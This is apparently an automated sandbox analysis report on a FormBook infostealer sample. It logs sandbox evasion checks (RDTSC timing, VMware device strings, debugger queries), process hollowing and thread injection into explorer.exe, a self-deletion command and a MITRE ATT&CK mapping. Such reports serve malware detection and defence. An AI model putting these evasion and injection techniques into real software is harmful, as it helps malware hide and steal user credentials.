          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009ED0D1 push ecx; ret 1_2_009ED0E4
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_00416147 push esi; iretd 1_1_0041614A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_00416125 push ds; retf 1_1_0041612B
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_004153DC push es; retf 1_1_004153E5
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_0041B3F2 push eax; ret 1_1_0041B3F8
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_0041B3FB push eax; ret 1_1_0041B462
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_00415B8C push ebp; ret 1_1_00415BD2
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_1_0041B3A5 push eax; ret 1_1_0041B3F8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B1D0D1 push ecx; ret 9_2_04B1D0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B06125 push ds; retf 9_2_00B0612B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B06147 push esi; iretd 9_2_00B0614A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B0B3A5 push eax; ret 9_2_00B0B3F8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B05B8C push ebp; ret 9_2_00B05BD2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B0B3F2 push eax; ret 9_2_00B0B3F8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B0B3FB push eax; ret 9_2_00B0B462
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B053DC push es; retf 9_2_00B053E5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B0B45C push eax; ret 9_2_00B0B462
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B04E12 push ebx; ret 9_2_00B04E14
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00B04FCB pushfd ; iretd 9_2_00B04FCC
          Source: initial sampleStatic PE information: section name: .data entropy: 7.74690382322
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeFile created: C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeFile created: C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000AF85E4 second address: 0000000000AF85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000AF896E second address: 0000000000AF8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004088A0 rdtsc 1_2_004088A0
          Source: C:\Windows\explorer.exe TID: 4832Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6468Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A15
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_004065C1 FindFirstFileA,FindClose,0_2_004065C1
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: explorer.exe, 00000004.00000000.232704653.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.232704653.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000004.00000000.233719341.0000000008907000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000004.00000000.237000933.000000000F540000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.231945952.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.230868572.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000002.483847310.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000004.00000000.232704653.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000004.00000000.232704653.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.232804005.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000004.00000000.225509168.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000000.230868572.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.230868572.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: lpdKSOB78u.exe, 00000000.00000002.211513573.0000000000808000.00000004.00000020.sdmpBinary or memory string: ECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\>
          Source: explorer.exe, 00000004.00000000.237000933.000000000F540000.00000004.00000001.sdmpBinary or memory string: qeMusic
          Source: explorer.exe, 00000004.00000000.230868572.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_004088A0 rdtsc 1_2_004088A0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00409B10 LdrLoadDll,1_2_00409B10
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_70481A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70481A98
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_703C47AD mov eax, dword ptr fs:[00000030h]0_2_703C47AD
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 0_2_703C45AA mov eax, dword ptr fs:[00000030h]0_2_703C45AA
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999080 mov eax, dword ptr fs:[00000030h]1_2_00999080
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CF0BF mov ecx, dword ptr fs:[00000030h]1_2_009CF0BF
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]1_2_009CF0BF
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]1_2_009CF0BF
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]1_2_00A13884
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]1_2_00A13884
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D90AF mov eax, dword ptr fs:[00000030h]1_2_009D90AF
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A2B8D0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]1_2_009AB02A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]1_2_009AB02A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]1_2_009AB02A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]1_2_009AB02A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]1_2_00A64015
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]1_2_00A64015
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]1_2_00A17016
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]1_2_00A17016
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]1_2_00A17016
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]1_2_009B0050
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]1_2_009B0050
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A61074 mov eax, dword ptr fs:[00000030h]1_2_00A61074
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A52073 mov eax, dword ptr fs:[00000030h]1_2_00A52073
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CA185 mov eax, dword ptr fs:[00000030h]1_2_009CA185
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009BC182 mov eax, dword ptr fs:[00000030h]1_2_009BC182
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]1_2_0099B1E1
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]1_2_0099B1E1
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]1_2_0099B1E1
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]1_2_00999100
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]1_2_00999100
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]1_2_00999100
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]1_2_009C513A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]1_2_009C513A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]1_2_009B4120
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]1_2_009B4120
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]1_2_009B4120
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]1_2_009B4120
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009B4120 mov ecx, dword ptr fs:[00000030h]1_2_009B4120
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]1_2_009BB944
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]1_2_009BB944
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]1_2_0099B171
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]1_2_0099B171
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]1_2_009CD294
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]1_2_009CD294
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009CFAB0 mov eax, dword ptr fs:[00000030h]1_2_009CFAB0
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]1_2_009952A5
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]1_2_009952A5
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]1_2_009952A5
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]1_2_009952A5
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]1_2_009952A5
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]1_2_00A4B260
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]1_2_00A4B260
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A68A62 mov eax, dword ptr fs:[00000030h]1_2_00A68A62
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]1_2_00999240
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]1_2_00999240
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]1_2_00999240
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]1_2_00999240
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009D927A mov eax, dword ptr fs:[00000030h]1_2_009D927A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A65BA5 mov eax, dword ptr fs:[00000030h]1_2_00A65BA5
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]1_2_009A1B8F
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]1_2_009A1B8F
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A4D380 mov ecx, dword ptr fs:[00000030h]1_2_00A4D380
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A5138A mov eax, dword ptr fs:[00000030h]1_2_00A5138A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_00A5131B mov eax, dword ptr fs:[00000030h]1_2_00A5131B
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099F358 mov eax, dword ptr fs:[00000030h]1_2_0099F358
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099DB40 mov eax, dword ptr fs:[00000030h]1_2_0099DB40
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]1_2_009C3B7A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]1_2_009C3B7A
          Source: C:\Users\user\Desktop\lpdKSOB78u.exeCode function: 1_2_0099DB60 mov ecx, dword ptr fs:[00000030h]1_2_0099DB60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFE730 mov eax, dword ptr fs:[00000030h]9_2_04AFE730
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFA70E mov eax, dword ptr fs:[00000030h]9_2_04AFA70E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AFA70E mov eax, dword ptr fs:[00000030h]9_2_04AFA70E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B8131B mov eax, dword ptr fs:[00000030h]9_2_04B8131B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B5FF10 mov eax, dword ptr fs:[00000030h]9_2_04B5FF10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B5FF10 mov eax, dword ptr fs:[00000030h]9_2_04B5FF10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B9070D mov eax, dword ptr fs:[00000030h]9_2_04B9070D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B9070D mov eax, dword ptr fs:[00000030h]9_2_04B9070D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AEF716 mov eax, dword ptr fs:[00000030h]9_2_04AEF716
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACDB60 mov ecx, dword ptr fs:[00000030h]9_2_04ACDB60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADFF60 mov eax, dword ptr fs:[00000030h]9_2_04ADFF60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B98F6A mov eax, dword ptr fs:[00000030h]9_2_04B98F6A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF3B7A mov eax, dword ptr fs:[00000030h]9_2_04AF3B7A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04AF3B7A mov eax, dword ptr fs:[00000030h]9_2_04AF3B7A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04B98B58 mov eax, dword ptr fs:[00000030h]9_2_04B98B58
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACDB40 mov eax, dword ptr fs:[00000030h]9_2_04ACDB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ADEF40 mov eax, dword ptr fs:[00000030h]9_2_04ADEF40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_04ACF358 mov eax, dword ptr fs:[00000030h]9_2_04ACF358
          Source: C:\Users\user\Desktop\lpdKSOB78u.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\lpdKSOB78u.exe Section loaded: unknown target: C:\Users\user\Desktop\lpdKSOB78u.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\lpdKSOB78u.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\lpdKSOB78u.exe Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\lpdKSOB78u.exe Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\raserver.exe Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\lpdKSOB78u.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\lpdKSOB78u.exe Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 1330000
          Source: C:\Users\user\Desktop\lpdKSOB78u.exe Process created: C:\Users\user\Desktop\lpdKSOB78u.exe 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lpdKSOB78u.exe'
          Source: explorer.exe, 00000004.00000000.214145154.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000004.00000000.214937637.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.473091261.0000000003350000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.229364456.0000000006860000.00000004.00000001.sdmp, raserver.exe, 00000009.00000002.473091261.0000000003350000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.214937637.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.473091261.0000000003350000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.214937637.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000009.00000002.473091261.0000000003350000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\lpdKSOB78u.exe Code function: 0_2_00403486 EntryPoint, SetErrorMode, GetVersion, lstrlenA, #17, OleInitialize, SHGetFileInfoA, GetCommandLineA, CharNextA, GetTempPathA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, GetTempPathA, lstrcatA, SetEnvironmentVariableA, SetEnvironmentVariableA, SetEnvironmentVariableA, DeleteFileA, OleUninitialize, ExitProcess, lstrcatA, lstrcatA, lstrcatA, lstrcmpiA, SetCurrentDirectoryA, DeleteFileA, CopyFileA, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Path Interception | Access Token Manipulation 1 | Virtualization/Sandbox Evasion 3 | OS Credential Dumping | Security Software Discovery 231 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Process Injection 512 | Access Token Manipulation 1 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 512 | Security Account Manager | Process Discovery 3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 3 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 2 | Cached Domain Credentials | System Information Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

          Behavior Graph

          [Behavior graph (ID 356515): sample lpdKSOB78u.exe, start date 23/02/2021, architecture WINDOWS, score 100. Process chain: lpdKSOB78u.exe -> lpdKSOB78u.exe -> explorer.exe (injected) -> raserver.exe -> cmd.exe -> conhost.exe.]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          lpdKSOB78u.exe | 44% | Virustotal |
          lpdKSOB78u.exe | 36% | ReversingLabs | Win32.Trojan.Convagent
          lpdKSOB78u.exe | 100% | Joe Sandbox ML |

          Dropped Files

